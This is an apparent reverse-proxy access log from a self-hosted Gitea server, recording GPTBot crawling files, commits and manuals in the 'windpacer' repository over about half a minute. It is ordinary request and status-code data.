[Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:23:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:23:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query" +[17/Feb/2026:17:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 30468064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2fcontroller-cpp2.md" [Client 74.7.227.38] [Length 22279] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" +[17/Feb/2026:17:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" +[17/Feb/2026:17:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19745] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" +[17/Feb/2026:17:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21439] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17356] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21439] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21438] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py?display=source" [Client 74.7.227.38] [Length 11803] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" +[17/Feb/2026:17:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17356] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17357] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md?display=source" [Client 74.7.227.38] [Length 12559] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 11969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21439] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py?display=source" [Client 74.7.227.38] [Length 29776] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" +[17/Feb/2026:17:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21440] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21443] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md?display=source" [Client 74.7.227.38] [Length 20626] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" +[17/Feb/2026:17:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" +[17/Feb/2026:17:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21441] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md?display=source" [Client 74.7.227.38] [Length 19996] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11017] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" +[17/Feb/2026:17:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py?display=source" [Client 74.7.227.38] [Length 11770] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" +[17/Feb/2026:17:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21441] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py?display=source" [Client 74.7.227.38] [Length 12557] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" +[17/Feb/2026:17:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 10993] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" +[17/Feb/2026:17:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md?display=source" [Client 74.7.227.38] [Length 12558] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21441] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" +[17/Feb/2026:17:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" +[17/Feb/2026:17:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21439] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py?display=source" [Client 74.7.227.38] [Length 29744] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" +[17/Feb/2026:17:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" +[17/Feb/2026:17:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" +[17/Feb/2026:17:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17329] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21438] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14317] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" +[17/Feb/2026:17:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 11668] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 9794] 